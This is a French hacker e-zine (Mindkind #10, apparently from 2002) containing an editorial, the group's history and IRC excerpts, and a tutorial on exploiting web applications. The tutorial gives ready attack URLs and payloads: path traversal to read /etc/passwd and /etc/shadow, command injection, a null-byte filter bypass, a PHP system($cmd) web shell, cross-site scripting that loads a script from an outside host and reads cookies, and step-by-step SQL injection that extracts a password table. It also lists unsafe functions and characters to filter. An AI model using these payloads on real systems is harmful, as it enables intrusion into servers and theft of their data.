 _____ _ _______  __________ _ _  ,______  __                                     _______.
|                               \ \____ _ ___\                                    \      \
|                                \                                                 \      \
|                                 \   ______ ___    ____________ ____ __            \      \
.                                  \ \          \  \                     \     ____ _\      '
                                    \ \          \  \          __         \   /             | 
|          |\            /|          ' .          '  '        '. \         ' | .            '
|          . '          . |          | |          |  |         | |         | |              |
.__________| |__________| |__________| |__________|  |_________| |_ _ _____|  \____________/


 ___________     _______                                        ___
|           |   /       /                                      |   |                  ______
|           |  /       /    ______                             |   |                 |__    |
|             /       /    |______|                            |   |    ___   ___       |   |
|           |/       /                                         |   | __|   |_|   |__   _|   |_
|                   /                 ___________        _____,'   ||               | |_______|
|                   \       _ ____   |            \     /          ||__     _     __|   ,_ __
|                    \     |      |  |      __     \   | .         | __|   |_|   |__   /     \
|          |\         \    |      |  |     |  |     |  |           ||               | |  _|_  |
|__________| \_________\   |      |  |_____|  |_____|   \_____ _,__||__     _     __| |   |   |
  ___ _____ _ ____________,'      '__ _ ________ _______________ _____ |___| |___|     \_ ___/
 |                                                                    
  \____ ___ The smilling script kiddies strike again ;  mindkind e-zine issue #10 __ __ __


                  |               ************** *                        
                 ==                ***************                        
                 ||                *************                          
                 ||                  **********                           
                 ||                 * *********                           
              +--||-+,      +-----+, *******                              
              |'+-----+     |'+-----+ ******                              
     \        |;|.....|     |;|.....| ***                                 
      \\      |,|.....|     |,|.....|****                                 
       \\     |,|.....|     |,|.....|****                                 
 >-Mindkind-> |,|.....|     |X|.....|**                                   
       //     |,|.....|     |X|.....|                                     
      //      |,|.....|     |X|.....|                                     
     /        |,|..P..|     |,|..Q..|                  -= Mindkind 10 =-          
              |,|..Y..|     |,|..H..|     -= L'attaque du Qubec Undergrounne Center =-
              |,|..R..|     |,|..A..|                                     
              |,|..O..|     |,|.....|               -= Joyeux 11 septembre =-      
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....|     |,|.....|                                     
              |,|.....+-----+,|....+--------+,                            
              |,|.....|'+-----+....|'+--------+  +--------------------+,  
              |,|.....|,|.....|....|,|........|  |'+--------------------+ 
-------,      |,|.....|,|.....|....|,|........|  |,|....................| 
+-------+     |,|.....|,|.....|....|,|........|  |,|....................| 
|.......|----------+..|,|.....|....|,|........|  |,|....................| 
|.......|-----------+.|,|.....|....|,|........|  |,|....................| 
|.......|...........|-|,|.....|----|,|........|  |,|....................| 
|.......|...........| |,|.....|    |,|........|  |,|....................| 
|.......|...........| |,|.....|    |,|........|  |,|....................| 
|.......|...........| |,|.....|    |,|........|  |,|....................| 
|.......|...........| +,|.....|    +,|........|  +,|....................| 
+-------+-----------+  '+-----+     '+--------+   '+--------------------+ 
-------------------------------------------------------------init_null----



     Vous savez tous comme moi. qu'un disclaim, a  sert  entre  autre    deux
choses, un se laver les mains de cque  vous  pourriez  faire  de  stupide  avec
l'information qu'on vous donne  (surtout  si  vous  le  faite  imprimer,  faite
attention avec la brocheuse) et  justifier le produit. Ceci dit,  faite  comme
si c'tait  fait,   car  vous  ne  verrez  pas  l'ombre  d'une  excuse,   d'une
justification ou de quoi que ce soit en ce genre dans ce disclaim. Par  contre,
on a retrouv vos clef de char, elles taient ici finalement.

                                     __________
                                    /  H0nd4   | 
               ____________________/      __   |
              / ------------------       |  |  |
              \                          |  |  |
               \/\/\/\/\/\/\/\/\/\/\     |__|  |
                                    \  R4c|ng  |
                                     \_________|


     En gnral la plupart des groupes se servent de leur disclaim pour blaster
les autres groupes et envoyer leur blast de  merde.   Cependant,  il  se  passe
tellement rien dans la scne depuis 2 ans, que  coup sr personne n'a t  con
 une assez grande chelle pour que a vaille la peine d'en parler. Alors on va
se contenter de toute vous blaster pour avoir rien faite et que j'en  voye  pas
un nowhere venir dire qu'on fait dla marde, qu'il se regarde avant, il a  moisi
dans son jus depuis 2 ans. 

On aurait bien p se rabattre sur  les  classiques  binf,  spyd  et  cie,  mais
malheureusement ils sont out2date, alors, on s'excuse, mais on vous promets  de
trouver une nouvelle tte de turc pour le prochain ezine. 

J'vas donc en profiter pour traiter le CRTC d'une gang de  nazis  qui  veullent
touffer la seul vrai radio au Qubec, CHOI RADIO X. Jean  Chrtien  pour  tre
toujours aussi cave, et qui risque d'endetter le Canada encore plus juste  pour
qu'on se souvienne de lui. Les employs  de  Vidotron  qui  m'on  fait  perdre
Internet 5x en 2 semaines (criss de bande de caves), tout ceux qui voterons pas
ADQ aux prochaines lections (fucking retard) et Sarah michelle Gellar, qui  se
marie avec freddie prince junior (criss de folle). 

Afin de s'assurer une meilleure flexibilit, nous avons divis  Mindkind  en  4
dpartements distincts. Soit Hacking, Coding, Phreaking et Philosophie. En quoi
a change votre vie ? Et bien, a va simplifier les communications advenant  le
cas que vous dsireriez nous faire part d'un commentaire, soumettre un  projet,
voir  soumettre  votre  candidature  pour  joindre  notre  projet   (la   seule
discrimination faite est envers la stupidit).

donc

Commentaires, propositions, acclamations, (generic.o)     Mindkind@mindkind.org
Hacking                                                  MindFlayR@mindkind.org
Coding                                                    LastCall@mindkind.org
Phreaking                                                    c4ndu@mindkind.org
Philosophie                                                Wyzeman@mindkind.org


Alors, si vous dsirez communiquer avec nous, vous savez maintenant par o
passer dpendamment du sujet de votre requte, si vous tes pas sur, opter
pour mindkind@mindkind.org

Sur irc vous pouvez nous rejoindre sur les  channel #mindkind  de  Undernet,
Dalnet, Efnet et OpenProjects. Tout ces chans sont relis via botnet  notre
HQ sur Undernet, alors on vous manquera pas, mme si on a l'air pas la.


									Wyzeman




   _/_/_/ _/_/_/ _/_/ _/ _/_/
    _/   _/  _/ _/_/ _/ _/
   _/   _/_/_/ _/   _/ _/_/
 -----------------------------

 _______________ __________________________ _____________ ________
(___   _____ _ _______ _____ __ _ __ _________________ _____   ___)
 ___\  \_ ______ _______________ _____ __ ___ _____ __ ____ \  \__        
|                               
|  NB                     TITLE                      AUTEUR         
| 
| 10.1  Le patrimoine lmurien                       LastCall_
| 10.2  Un CGI scomme un radio de char, tlt bugg    MindFlayR
| 10.3  Cette article n'existe pas                   Wyzeman
| 10.4  Easy way to free VBM                         c4ndu
| 10.5  Reverse Engeneering on the fly               [Funky]
| 10.6  Internet kess a ?                          LastCall_
| 10.7  Savais-tu ? Internet est compos  80% d'eau LastCall_
| 10.8  Life suxx, so be it                          h3
| 10.9  Trojan horse the sequel                      Wyzeman
| 10.10 Perl harbor                                  LastCall_ 
| 10.11 No is'nt Wyze                                boredom2k
| 10.12 Armoring Slackware again                     Wyzeman
| 10.13 Gotcha not Gotcha                            MindFlayR
| 10.14 Nostalgie ou badtrip ?                       LastCall_
| 10.15 Easy way to free internet with free VBM      c4ndu
| 10.16 Sleeping is bad                              Tigerbalm
| 10.17 Guerre epais                                 Wyzeman
| 10.18 News from the front                          The Staff
       __       ___                                 
 __ ___\ \_____/__ \_______ __________ _____________________ _____
|_______\ \_______\ \______________ _______ ________ __________ __|
         \ \_/ /   \ \______
          \___/     \____o O/  - why you r looking at me?  
                         \'/




                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Le patrimoine Lemurien, by LastCall_                      / 10.1   /
'          aka: Stun peu comme TV hebdo                    .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Le patrimoine lmurien vous prsente :
Histoire de Mindkind; the dark ages & la renaissance


Mai 2001 : The start and crash
  Le ezine 1 est releas. Tout le monde  est  heureux  de  l'avoir  sorti
  paske c hot avoir un ezine de 261k  qui  prend  90  pages    imprimer
  au cgep. Sauf que... le ezine se retrouve tout seul.   Sans  amis.  On
  sait pas trop pourquoi, mais personne a t rellement contre, ou pour.
  Bien sre on avait quelques fans et quelques CHOU qui nous on dit qu'on
  tait trop baveux. On nous a aussi dit qu'on c'tait PLANTER car  on  a
  trop faite chier de monde et on a perdu de bons lments? Well les gens
  nous ont faite oublier qu'on voulait tre "underground"  notre saveur.
  On tait juste un gros ezine, comme un Qubec Micro 1999 avec  qqn  qui
  sourit sur la page couverture.
  Rien de plus.. alors Mindkind fut oubli...

Juin 2001 : On s'est essay.
  Oui on s'est essay d'en "chier" un deuxime.. mais malheureusement, le
  fun tait pu la du cot  LastCall_ et Wyzeman a fini par tre (encore)
  dcourag. Donc tout le monde ont t se cacher de  leur  cot,  et  le
  chan s'est vid sauf pour 2 personnes : LastCall_ et  init_null.  Quand
  Wyze fut parti, notre bon ami d'une autre time zone  qui  fittait  avec
  notre style de vie (NighWulf!) revenu sur le chan. 
  Et a nous a fait qqn  jaser...

Juillet 2001 : Un chan de idleux, un ezine oubli
  Pendant que les gars baisaient (init s'adonnait au ftichisme du menton
  et Last .. humm sans commentaires, et Night vu qui avait la tte en bas
  pouvait pas rien faire) les bots s'occupaient de faire de la "vie"  sur
  le chan.  part a, le ezine fut oubli compltement... sauf  p-e  Last
  qui l'avait imprim et l'apparition sur textfiles.org (ou  de  quoi  du
  genre). Bien sre, il y a  eu  le  splendide  MeetFest   (organis  par
  MagicianX), qui fut trs le fun,  mais  le  pauvre  MagicianX  a  perdu
  espoir en "l'underground". Srement que cet  underground  n'est  pu  ce
  qu'il tait.. c'est rendu l'undergrounne maintenant. Au  moins  j'aurai
  retir une chose de a : 1 semaine  bouffer des hotdogs! (hahaha)

Aout 2001 : rien sauf  la fin
  Vu qu'on se tanne pas de baiser (vive l't hein) si facilement,  il  a
  fallu attendre la fin du mois pour que init_null dcide  de  faire  une
  radio. Un ass bon succs, au moins 10-15 users.. LastCall_ de son cot
  tait dans la rue (sans logement), mais il a quand mme  russi    lui
  faire des spots.. c'est d'ailleurs  la fin de ce  mois  que  kidZ,  le
  porte parole de QHA vit le jour. heh
  
Septembre 2001 : Comment LastCall_ est devenu millionnaire
                 en codant un jeu de loterie en Perl
  Joke. Mais j'ai rien  dire pour septembre? Je pense  que  Wyzeman  est
  revenu sur le chan, mais sans rien faire de trop trop concret..   part
  chatter avec du monde (et oui vous le savez Wyze   tjrs  un  but  avec
  toute, mme si c'est des buts sans but). Aussi,  ce que je me  rappel,
  Last et Wyze avait donn concession  Night pour qui fasse de koi  avec
  Mindkind mais malheureusement on a jamais rien vu de concret...

Octobre 2001 : ya tu faite frette cte mois la
  Wyze a donc fini par faire joiner 56 personnes dans le chan et se remit
   faire le site web. On feelait toute tout croche  aprs  qu'on  savait
  que les buildings pouvait p-e tomber sur nous, fak le monde se sont mis
   faire des articles de PHILO que Wyze s'empressa de mettre sur le web.

Novembre 2001 : Mindkind ctun beau nom pareil
  Le site commenait  tre rempli de plus d'articles.. Wyze faisait  des
  TCL  planche et avait fini un paquet d'articles trop lames  pour  tre
  mis dans le mega lite IGA (qui en passant on ferm le  chan  PASKE  LE
  MONDE TAIT TROP DES PIPIS!!! haha). On avait entendu l'expression "#2"
  a quelques reprises (genre un #2 avec des spiribs pis de la sauce soya)
  et puis Wyze sorti : 
  <Wyze[AW]> LastCall_ init_null Qwzykx [FunkY] on sort un #2 ?
  Qwzykx, qu'on avait pas vu parler sur le chan depuis 1984 disa ttsuite:
  [16:52] <Qwzykx> hehe :) hee (deja!?) :) ouais plutot y serait temps :)
  init poursuivit avec un "ouep a fiterais" et LastCall_ sorti  avec  10
  minutes de lag une phrase trs conluente et rvlatrice : 
  [16:59] <LastCall_> yeah
  La suite se passe de commentaire, mais est rempli d'amour de bonheur et
  de joie :
  [16:59] <LastCall_> the smiling scripts kiddies will strike again
  [16:59] <LastCall_> ahha
  [17:00] <Wyze[MKD]> :]
  And so on...

Fin Novembre 2001 : Mindkind.. ahuuu?
  Comme si c'tait faite exprs pour  nous  dcourager  (paranoa!),  une
  gagne de personne on sorti un Mindkind 2 avant le vrai... wow! Au dbut
  on tait content de se faire niaiser,  a  nous  donnait  une  certaine
  importance. Mais par la suite on s'est rendu compte que c'tait que des
  propos haineux et sans vrais fondements. Mais le  scam  marchait  bien,
  c'tait drle, les gens riait des membres de Mindkind   (Wyze  et  Last
  pour ne nommer  qu'eux)  ainsi  que  du  "groupe"...   LastCall_  leurs
  rpondis avec une sries de stades d'motions et autres :
  1) "haha" c drle.
  2) Enfin qqn fait de koi (oui de l'action)
  3) "haha" ouan.. c ben drole.. mais c pas ass recherch  mon got
  4) sont chanceux ces enfants la.. y'on encore du temps  perdre
  5) Finalement y'on pas plus de substance qu'une garderie  5$
  6) Mais je suis tjrs aussi h0t (ironie++)
  7) Y se batte contre les groupes "caves" en formant un groupe de caves.
  Donc finalement, des gens ont souffert, d'autres ont rit.. mais rien de
  constructif n'est venu d'ailleurs que  Mindkind ( pyrofreak = la  place
  ou les cons se tiennent, iga = o tes-vous depuis que __2 a ferm le
  chan?, nn = encore en criss aprs nous? )

Dcembre 2001 : Mindkind still here and the pre nowel rux
  La farce continue, mais elle est rendu populaire.. bcp de  monde  parle
  de Mindkind par ci, LastCall_ par la, Wyzeman par ici, le  Pre  Nowel
  par la. Ce que a va leurs apporter? En date du 2ime du mois,   on  ne
  peut vraiment pas rien prdire... hum, 1 mois plus tard  je  peux  dire
  que a la pas faite long  feu... hehe.   D'ailleurs  c'est  mme  toute
  oubli! Srement que la radio 31337 anim par  init_null  et  LastCall_
  LIVE AT MONTRAL a d changer les ides de tlm.. :-)
  http://mindkind.org:8787/radio31337mtl/

Janvier 1984 : Fuck mon editpad passe pas l'an 2001.
  Choses qu'avec le temps on fini par tre coeur d'entendre :
  - Penser vous qui va avoir un bug en 65537 ?
    > Sacrer nous patience, on va tre mort on s'en sacre!
  - C LAME CTE EZINE
    > C'est sure on s'appelle pas binf. 
      Mais ail, binf pense la mme chose que vous sur nous mais sur vous.
  - pyrofreak
    > Ctais pas ben ben marrant lire les derniers pyro.. manque d'essence
      Ckon aime c de l'autencit.. comme Mindkind qui rip  off  IGA  mais
      qu'on dirait que c lame diffremment. Mais pkoi vous  changer  pas
      de nom? Suggestions : burofreak, biblefreak, igafreak (haha again!)
  - asv
    > toute mais pas a.

Janvier 2002 : Zwill zwill
  Well LastCall_ pis Wyzeman se remettent au boulot encore une  fois.  Un
  nouveau site web est cr et quelques outils  web  le  sont  itoo.   La
  machine continue de rouler! vroum vroum!

Fvrier 2002 : Let's get serious!
  Bien que les  choses  avances  lentement,  les  choses  avance.  Chaque
  personne implique dans le "Projet Mindkind"  s'entend  pour  dire  que
  nous devons commencer  tre plus srieux. On s'est donc  entendu  pour
  _vraiment_ recorriger nos articles. Le franais est  en  quelque  sorte
  important et donne plus de crdibilit.
  Le fun du dbut s'est maintenant transformer en un fun plus mature.

Mars 2002 : how to forget a ezine in 2 hours
  C'tait srement ce que plusieurs personnes voulaient depuis longtemps.
  Ces personnes se sont srement rjouies...  rien voir. On a toute  dit
  fuck off pour un ezine sous la pression d'en sortir  un  paske  on  est
  trop "lame" sinon... Wyzeman s'est surtout  coeur.   Les  autres  ont
  suivi; faut dire aussi qu'une badluck de  HD  a  faite  qu'on  a  perdu
  l'autre version du site web.. et Wyze avait mit ben du temps.  M'enfin,
  on tait pu intress, on tait coeur de l'hivers... m'enfin toute  
  t criss la.. a prenait qqn que a lui tente de faire quelque  chose
  et a y'en avait pas pour Mindkind Ezine. Nyways tout fini par tre aux
  oubliettes...

Mai 2002 : toute dgle.. m'enfin presque
  Aprs un gros mois de lthargie pis d'oublie, le monde on commenc  se
  rveiller. Faut dire que le cgep tait   veille  de  finir,  pis  que
  l'universit tait fini, les vacances d't taient  la...  Last  s'est
  rveiller et a particip  la mise en oeuvre d'un LAN party   Montral
  ( http://lan.etsmtl.ca ). Pour Mindkind Ezine, ben yavait pu rien, last
  avait assouvie ses envies de ezine avec LJNB  (http://journal.bidon.ca)
  et les autres.. well on s'en calice d'un  ezine l't  non?  M'enfin  
  part pour plugger des URL de Last le mois de mai a pas  servi    grand
  chose..
  
Juin 2002 : party fucking hard.
  Le chan a enfin dgel.. mais pas full enlign pour faire  de  quoi  de
  concret... Du genre Wyze tait port disparu (ytait surement encore en
  train de peinturer des poubelles ;-), mais MindFlayR a rejoins le chan.
  Pis ya d'autres troubadours qui sont rests sur le chan.. mais on a pas
  vu d'action online avant juillet..

Fin Juin 2002 : St-Jean alcoolo.
  Last a faite un petit tour  Qubec pour la St-Jean, a  la  dgel  un
  peu les choses entre lui et Wyze... ben  vrai dire  toute  tait  plus
  'chaud' (on tien  saluer la serveuse dans le fond  du  Monkey  de  Qc,
  qui tait sans aucun doute, d'une chaleur intense).

Juillet 2002 : va zy mollo mais va zy mon gros
  Wyzeman a fini par lcher IGA. Eh oui, grande primeur, y'tait  suppos
  avoir un autre IGA, mais a d'lair que __2 s'en amusait pas ass?  Pour
  les gens qui voulaient voir qqchose c'tait pas  fort...  on  regardait
  autour, on voyait pyrofreak avec le  clown    Patoff  qui  dplug  des
  machines avec des CPUs dans les centres d'achat... pathtique  (jeu  de
  mots pyro!). Pas fort.. mme QHA a pu faite parler de lui (srement que
  la page web avec encre un new look tait en prparation!). Mme LJNB le
  journal side line #346 de last tait en "relche".. donc tout le  monde
  s'est pitch sur Mindkind.  Article  ici,  projet  par  la,  y'a  fallu
  attendre en aot pour voir le rsultat.

Aot 2002 : wow du monde
  Le chan s'est magiquement peupl. On peut  dire  que  le  chan  est  la
  base de la chose, car vu que les lmuriens Mindkind sont  parpills  
  travers tout le Qubec, IRC demeure l'endroit de prdillection (surtout
  avec une key, c'est tranquille (et un ban sur Flopik... ahh  la  paix).
  Donc le chan a grimp  20 users (par chez  nous  on  compte  les  bots
  comme des tres  part entire!). a commena donc  tre  intressent,
  tant de ressources,  tant  de  choses  qui  se  brassent.  MindFlayR  a
  enregistr mindkind.org (yah un domaine!) car le .wox.org nous a  faite
  chier. Last  a  fait  un  CVS  sur  SourceForge  sans  trop  de  succs
  ( http://mindkindware.sourceforge.net ) mais les autres ont aussi  fait
  un paquet d'affaires dans leurs coins.. Articles, botnet, scripts  pour
  eggdrop/mirc, alouette. On s'est ramass une bonne gagne  de  personnes
  et un mlange htrogne : unix/win,  gars/filles,  hack/philo,  etc...
  C'tait tiguidou et c'est en septembre que nous avons dcid de  lancer
  le ezine.. car aprs tout, nous n'avions pas perdu notre tribune,  nous
  avons juste ferm notre yeule pendant un boutte.
  
Septembre 2002 : + Mindkind
  L'action va de bon train, on peut dire que ENFIN il y  a  une  certaine
  atmosphre d'action...  ce jour nos chers collaborateurs sont :
  Wyzeman, LastCall_, MindFlayR, c4ndu, init_null, [FunkY], Orange_,
  Zarath, XeliteX, h3, ExPl0iTeD, RaZerSide, Tigerbalm, ticker,
  Calamite, MacBeth21 et quelques autres.
  Tous oeuvrant dans des domaines diffrents, aidant de  leurs  bords  le
  collectif, aidant les autres, gossant si, discutant de t'a, crire si,
  coder a.. la joie! C'est donc dans cette atmosphre  radieuse  (insert
  music ktaine here) rempli de bonheur,  de joie, de bytes, d'amour,  de
  pixels et de prosprit, que Mindkind 10 est lanc. Heuu ouan... c't'un
  peu trop ktaine..  mais nyways, on se marre car ce ezine est bcp mieux
  que le suppos deuxime de l'anne d'avant...
  + libre.. + leet.. + l'fun.. + Mindkind.


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | LastCall_                          lastcall@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|



   < Mindkind tales from IRC >
   (pour respecter l'anonymat de MindFlayR nous allons cacher son nick)
   
   [20:37] <cach> tu voit pas se que j'Ecris sur mindkind serieux ?
   [20:38] <LastCall_> non!
   [20:38] <LastCall_> haha
   [20:38] <cach> criss
   [20:38] <cach> donc bin fucker mon psybnc
   [20:38] <cach> :P
   [20:38] <LastCall_> hahaha
   [20:38] <cach> ca veux dire fais 2 mois je parle totu seul sur les chan
   [20:38] <cach> :P
   [20:38] <LastCall_> JHAHAHAHAHAH
   [20:38] <cach> c capotant
   [20:39] <LastCall_> jchtai parler
   [20:39] <cach> jparle vraiment tout seul depusi des mois :P
   [20:39] <cach> jmen sens cellule la
   [20:40] <LastCall_> 17:40] [LastCall_] hey MindFlayR t la?
   [20:40] <LastCall_> genre
   [20:40] <LastCall_> jai pas rien vu
   [20:40] <LastCall_> hahahah
   [20:40] <cach> ca fais depuis fin mars g se psybnc la
   [20:41] <cach> criss chui cave
   [20:41] <cach> jen reviens pas
   [20:41] <cach> ma brailler jpense
   [20:42] <cach> jmen demandais aussi pkio tout le monde m'ignorauis
   [20:42] <cach> :P

  < ----------------------- >


                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Find CGI hole in your fav CGI appz, by MindFlayR          / 10.2   /
'          aka: sometimes, cgi application are real bitch  .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Bon, ce texte  pour but de vous apprendre  dcouvrir les failles cgi/php/asp
les plus courantes. Question de pas se faire chier  lire un texte inintressant
sur le sujet, j'ai dcid de partir  la conqute des cgi mal cod sur le
web pour vous montrer  quoi peut mener la dcouverte d'une vulnrabilit
semblable. Il existe des centaines de scripts mal protgs sur le web, je
vais tout simplement vous expliquer comment les dcouvrir.

Erreur de filtrage (include)
=========
la faille de loin la plus facile et la plus courantes sur le web 

Cible:
http://www.vulnserv.com/index.php?page=prat_gard.php

la technique est en fait trs simple, il suffit de remplacer la valeur de
page= pour lire n'importe quel fichier sur le serveur avec les droits d'accs
du httpd.

Rsultat:
http://www.vulnserv.com/index.php?page=../../../../../etc/passwd

Il est donc possible de rassembler des informations sur le serveur ou de lire 
les passwords crypts si la shadow-suite n'est pas installe sur le serveur.
Il est aussi possible de lire le /etc/shadow si le script run en root. 

Exemple de script vulnrable en Perl

$this = $ENV{'QUERY_STRING'};      #prends l,input de l'user et le mets dans la variable $this
open(FILE, "$this");               #ouvre le fichier
@stuff = <FILE>;     		   #mets le contenu du fichier dans @stuff
close(FILE);

print "Content-type: text/html\n\n"; #afficher le contenu au client
print "<HTML><BODY>\n";
print @stuff;
print "</BODY></HTML>";


Erreur de filtrage (command ou system)
=========

L'objectif est de pouvoir excuter une commande sur le serveur avec
les droit d'accs du serveur web.

Cible:
http://www.vulnerable-server.com/cgi-bin/pwesson.cgi?page=ls%20-al|

Avec cette technique, il est possible de compiler un port binder ce qui
nous permet d'avoir un shell possdant le uid du httpd. Cela permet au
hacker de prendre contrle de votre machine  distance et peut mener
directement  un accs root illgitime.

Autres exemples:
http://www.vulnerable-server.com/cgi-bin/pwesson.cgi?page=id|
http://www.vulnerable-server.com/cgi-bin/pwesson.cgi?page=/../../../../../../../../bin/id|
http://www.vulnerable-server.com/cgi-bin/pwesson.cgi?page=|id\0


Fausse extension de fichier
=========

La faille est une modification d'une erreur de filtrage. Elle permet de djouer
les scripts qui vrifient l'extension du fichier demande par le script cgi.

Cible:
http://www.vulnserv.com/cgi-bin/news.pl?file=comm

Rsultat:
http://www.vulnserv.com/cgi-bin/news.pl?file=../../../../../../../../../etc/passwd
ne marche pas
http://www.vulnserv.com/cgi-bin/news.pl?file=../../../../../../../../../etc/passwd%00
marche

L'emploi du nullbyte en unicode (%00) permet de bypasser la protection vrifiant
l'extension du fichier. Il existe 2 faon de l'employer. Comme certain script
vrifie si l'extension est .html par exemple, il suffit de mettre l'extension 
demande aprs le %00
Exemple:
http://www.vulnserv.com/cgi-local/shop/cb.cgi?page=../../../../../../../../../etc/passwd%00
I am sorry, but you may only use this program to view HTML pages. If you absolutely MUST 
view non-HTML pages within your store, you must modify lines 79-81, but be careful, doing 
so may make your system vulnerable to hackers.No recipient addresses found in header

ton systme est dj vulnrable mister
preuve:
http://www.vulnserv.com/cgi-local/shop/cb.cgi?page=../../../../../../../../../etc/passwd%00html 

Il est donc possible de rassembler des informations sur le serveur ou de lire 
les password crypter si la shadow-suite n'est pas installer sur le serveur.
Il est aussi possible de lire le /etc/shadow si le script run en root. 
(same as #1)

Encoding:
Il est possible de crypter nos attaques en url-encode ou encore en hex question de bypasser
les IDS ou tout simplement les protections de faible niveau.


PHP system() command
====================
la commande
<?php
system($cmd);
?>
insrer dans une serveur web peux causer une grave vulnrabilit au niveau du webserver
exemple, appelons un fichier .php comprenant le code
<?php
system($cmd);
?>
bleh.php
Il suffit de faire www.serveurvuln.com/bleh.php?cmd=ls
pour excuter la commande ls sur le serveur. Donc l'utilisation de la commande
system est  viter pour des raisons de scurit.


Cross-Scripting Vulnerability
=============================
Elle consiste en l'excution de code javascript directement dans le browser ou tout simplement en guidant
le cgi sur un site (celui du pirate de prfrence). Le code fautif est par exemple en php
echo $HTTP_GET_VARS["data"];
Donc, une requte http du genre
http://www.serveurvuln.com/script.php?data=<script src="http://www.bleh.org/mechantscript.js"></script>
Va excuter le mechantscript.js sur le www.serveurvuln.com
ou il est aussi possible de faire la requete en url-encode ce qui donnerais quelque chose comme
http://www.serveurvuln.com/script.php?data=%3Cscript+src%3D%22http%3A%2F%2Fwww.bleh.org%2Fmechantscript.js%22%3E%3C%2Fscript%3E
Un autre bon exemple est par exemple 
http://www.vulnserv.com/perl/search/search.pl?text=vyucujici
le proof of concept nous montre qu'avec
http://www.vulnserv.com/perl/search/search.pl?text=<script>alert(document.cookie)</script>">
une fenetre d'alerte s'ouvrira :)
Le code fautif doit ressembler 
#!/usr/bin/perl
use CGI;

my $cgi = CGI->new();
my $text = $cgi->param('text');

print $cgi->header();
print "You entered $text";

Nous pouvons limiter les caracteres possible avec la commande
$text =~ s/[^A-Za-z0-9 ]*/ /g;

[ Note de LastCall_ :  moi je vous conseil de mtre #!/usr/bin/perl -T au dbut,
  a va vous avertir pour tout les problmes potentiels. ]


Strutured Query Language (SQL) injection
========================================
Le bug consiste  insrer une srie de commande SQL dans une "query" en
manipulant les donnes envoyes  l'application.
Une commande SQL ressemble  ceci :
select nom, prenom, surnom from groupe01

Cette commande permet de slectionner les colonnes "nom", "prenom" et "surnom"
de la table "groupe01". Il est aussi possible de spcifier un "membre" du
groupe par exemple :
select nom, prenom, surnom from groupe01 where prenom = 'martin'

Il est important de remarquer les '' autour de martin

L'injection consiste alors a executer une commande comme
select nom, prenom, surnom from groupe01 where prenom = 'martin'; drop table groupe01--
qui effacerait bien sur la table groupe01

Il est aussi possible de dterminer le contenu d'une table SQL avec l'aide de
cette technique. Pour les besoins de la cause, nous allons attaquer un site
protger par un l/p relie a une table MSSQL.

Nous excutons la commande
' having 1=1--
dans la case login du site
ce qui nous donne comme rsultat
Microsoft OLE DB Provider for ODBC Drivers error '80004005' 

[INTERSOLV][ODBC Informix driver][Informix]The column (user_id) must be in the GROUP BY list.

/reports/include/HCIAUtil.asp, line 71 

user_id tant bien sur le nom de la premier colonne.
Alors nous continuons l'injection avec la commande
'group by user_id having 1=1--
ce qui nous donne comme resultat
Microsoft OLE DB Provider for ODBC Drivers error '80004005' 

[INTERSOLV][ODBC Informix driver][Informix]The column (password) must be in the GROUP BY list. 

/reports/include/HCIAUtil.asp, line 71 

donc nous continuons avec la commande
'group by user_id, password having 1=1--

Ainsi de suite jusqu'a ce que nous possdions le nom de toute les colonnes de la table
Aprs nous devons dfinir le type de data que chaque colonnes possde. Nous avons pu 
dcouvrir que la table contenais 3 colonnes nommer "user_id", "password" et "user_type"
Nous excutons donc la commande
'union select sum(user_id) from users--
qui donne comme message d'erreur
Microsoft OLE DB Provider for ODBC Drivers error '80004005' 

[INTERSOLV][ODBC Informix driver][Informix]Sums and averages cannot be computed for character columns. 

/reports/include/HCIAUtil.asp, line 71 

Nous savons donc que la colonne "user_id" est de type character
'union select sum(password) from users--
la colonne password aussi
'union select sum(user_type) from users--


Analyser un code source
=======================
Les erreurs de programmation permettant une de ces attaques sont souvent causs
par une de ses commandes

PHP
---
require()
include()
eval()
preg_replace()
exec()
passthru()
`` (backticks)
system()
popen()

Shell Scripts
-------------
toujours TRES dangereux

Perl
----
open()
sysopen()
glob()
system()
'' (backticks)
eval()

Java(Servlets, JSP s)
---------------------
toute les commandes System.* (specialement System.Runtime)

C ou C++
--------

system()
exec**()
strcpy 
strcat 
sprintf 
vsprintf 
gets 
strlen
scanf() 
fscanf 
sscanf 
vscanf 
vsscanf 
vfscanf 
realpath 
getopt 
getpass 
streadd 
strecpy 
strtrns

Python
------
exec()
eval()
execfile()
compile()
input()

Rendre vos codes plus secures
=============================

Il faut a tout pris filtrer les requtes faites a vos application web.
Les generics meta-caracters doive tre viter le plus possible.
Les caractres causant problmes sont

Caractres		Problmes
----------		---------
;			execution de commande
|			execution de commande
!			execution de commande
&			execution de commande
%20			espace, fake url
%00			nullbyte, mauvais string, nom de fichier
%04			fausse fin de fichier
%0a			nouvelle ligne, execution de commande
%0d			nouvelle ligne, execution de commande
%1b			escape
%08			backspace
%7f			delete
~			tilde
' "			guillemets, base de donnes
-			base de donnes, nombre ngatif
*%			base de donnes
`			backstick, execution de commande
/\			slash, backslash, fake query ou path
<>			LT, GT
?			code/script
$			code/script
@			code/script
:			code/script

Il y a trs peu de raison d'utiliser ses caractres dans une application web lgitime.

J'espre que vous avez appris quelque chose en lisant cet article, somme toute, 
incomplet. Je ne peux que vous conseiller de vous tenir a jour sur le sujet.
Donc amuser vous avec a, coder brillamment, et optimiser la scurit de vos
sites web pour votre propre bien (et celui de vos donns).


Merci :
Zenomorph, medgi, LastCall_, Wyzeman, Chris Anley, Paul Lindner,
The Open Web Application Security Project, David Wong, b0iler


							

 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | MindFlayR                         MindFlayR@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




   < Mindkind tales from IRC >
   
   [20:43] <BiosLudge> ch po mon ami a un router pis cetais la meme chose
